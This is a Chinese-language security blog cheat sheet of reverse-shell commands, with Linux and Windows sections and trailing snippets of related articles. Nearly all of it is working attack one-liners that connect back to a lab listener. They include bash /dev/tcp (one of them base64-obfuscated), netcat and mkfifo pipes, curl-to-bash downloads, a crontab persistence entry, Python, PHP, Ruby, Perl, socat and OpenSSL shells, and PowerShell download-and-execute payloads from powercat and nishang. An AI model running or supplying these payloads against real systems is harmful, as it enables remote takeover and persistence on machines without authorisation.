反弹shell命令速查

VSole2022-07-28 06:13:42
一、反弹Shell-Linux
【监听端】centos: 192.168.35.152
【被控端】kali: 192.168.35.128
    
# 监听端执行
[root@localhost ~]# nc -vvl 7777
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777

1、bash

┌──(root@kali)-[/home/kali]
└─# bash -i >& /dev/tcp/192.168.35.152/7777 0>&1     # 执行失败                                   
zsh: 没有那个文件或目录: /dev/tcp/192.168.35.152/7777 

2、bash base64

# /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA==}|{base64,-d}|{bash,-i}'

3、bash base64 URLencode

# /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
bash -c '{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzUuMTUyLzc3NzcgMD4mMSAgIA%3D%3D}|{base64,-d}|{bash,-i}'

4、nc

nc -e /bin/bash 192.168.35.152 7777
mknod backpipe p && nc 192.168.35.152 7777 01
>backpipe rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.35.152 7777 >/tmp/f

5、ncat

ncat  192.168.35.152 7777 -e /bin/bash
ncat --udp 192.168.35.152 7777 -e /bin/bash

6、curl

# kali开启http服务,把bash命令写入html文件
cat bash.html
/bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
# centos
curl 192.168.35.152/bash.html|bash

7、http

攻击方:
# 编写shell脚本并启动http服务器
echo "bash -i >& /dev/tcp/192.168.35.152/7777 0>&1" > shell.sh
python2环境下:python -m SimpleHTTPServer 80
python3环境下:python -m http.server 80
被控端:
# 上传shell.sh文件
wget 192.168.35.152/shell.sh
# 执行shell.sh文件
bash shell.sh

8、crontab

* * * * * root bash -i >& /dev/tcp/192.168.35.152/7777  0>&1

9、whois

# 只能执行指定命令,如pwd命令
whois -h 192.168.35.152 -p 7777 `pwd` /python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.35.152",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

10、php

php -r '$sock=fsockopen("192.168.35.152",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

11、ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.35.152",7777).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'  # 执行失败
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.35.152","7777");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

12、socat

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.35.152:7777

13、perl

perl -e 'use Socket;$i="192.168.35.152";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

14、php

php -r '$sock=fsockopen("192.168.35.152",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

15、openssl

# 监听端
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 7777
# or
ncat --ssl -vv -l -p 7777
# 受控端
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.35.152:7777 > /tmp/s; rm /tmp/s

二、反弹Shell-Windows

Windows下的反弹shell仅测试了nc,执行成功。
【监听端】centos: 192.168.35.152
【被控端】windows: 192.168.35.1
    
# 监听端执行
[root@localhost ~]# nc -vvl 7777
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777

1、powercat

项目地址:https://github.com/besimorhino/powercat
System.Net.Webclient.DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.35.152 -p 7777 -e cmd

2、nc

nc 192.168.35.152 7777 -e c:\windows\system32\cmd.exe

3、nishang

Nishang是一个基于PowerShell的攻击框架,整合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。
项目地址:https://github.com/samratashok/nishang
# 将nishang下载到攻击者本地,在目标机使用powershell执行以下命令
IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.134/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.35.152 -port 7777

4、Reverse UDP shell

IEX (New-Object Net.WebClient).DownloadString('http://192.168.35.152/nishang/Shells/Invoke-PowerShellUdp.ps1');
Invoke-PowerShellUdp -Reverse -IPAddress 192.168.35.152 -port 7777

5、MSF

# 找出各类反弹一句话payload的路径信息msfvenom -l payloads | grep 'cmd/windows/reverse'
# 生成反弹shell,复制粘贴到靶机上运行msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.35.152 LPORT=7777
shellbash
本作品采用《CC 协议》,转载必须注明作者和本文链接
初识Shell
2022-03-11 22:42:44
程序是由序列组成的,告诉计算机如何完成一个具体的任务。编写程序花费的时间往往是实际运行时间的几十倍或几百倍。除了计算机生产厂家的专业人员外,绝大多数的 程序员已经不再去学习机器语言了。包含的功能几乎可以涵盖Shell所具有的功能,所以一般的Shell脚本都会指定它为执行路径。目前使用的 并不多,已经被/bin/tcsh所取代。
# 此时攻击机已经获取到了bash$ python -c 'import pty; pty.spawn'$ ctrl + z //快捷键。$ fg$ reset //这一步我实测有问题,输了会出问题,不输也没有影响,所以如果输了有问题可以不输。低权限提权首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Databas
0x01 Apereo cas简介Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service,是一个单点登录协议,Apereo CAS是实现该协议的软件包。Apereo CAS 4.1.X~4.1.6 默认密钥Apereo CAS 4.1.7~4.2.X KEY随机生成0x03漏洞利用与复现Webflow中使用了默认密钥changeit,所以我们就可以利用默认密钥生成序列化对象。
本文记录从零开始搭建F5 BIG-IP漏洞调试环境的细节。
验证子域邮箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源渗透物理渗透、物理攻击、近源渗透,这几个的意思都是在接近目标进行安全测试。Wi-Fi网线没有终端准入控制,直接插网线 DHCP 获取 IP。Bad USBBlack Hat 上提出 Bad USB。社会工程学在信息收集过程中就开始。钓鱼本质是利用人的信任。Windows 主机FTP服务端开启 FTP 服务。使用 certutil 下载的文件会原封不动在?目录下保存一份,文件名位随机字符,使用 delete 可以删除刚下载的缓存。
从Heartbleed到Apache Struts再到SolarWinds,这些是过去10年来发生的分水岭式的网络安全事件。严重的漏洞、广泛的网络攻击已经改变了网络安全的许多方面。为了回顾过去10年发生的安全事件,网络安全供应商Trustwave公司日前发表了一篇名为《十年回顾:漏洞状态》的博客文章,其中列出了过去10年中最突出和最值得注意的10个网络安全问题和违规行为。
AFL--模糊测试使用浅析
靶场Kioptrix Level 1攻略
2022-04-21 13:47:27
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
刚入行时在网上搜各种工具使用技巧及方法,通过别人的经验提高自身的技巧,然后再拿个小本本记录,这是每个网安人初入行时的必备姿势,那么今天丹丹就拿起先前做过的笔记和网上别人的经验做一个合集,把大部分使用到的工具技巧整理成册,后续自己以及大家查阅,如总结不到位的地方希望海涵,那现在就开始吧。。。。。
VSole
网络安全专家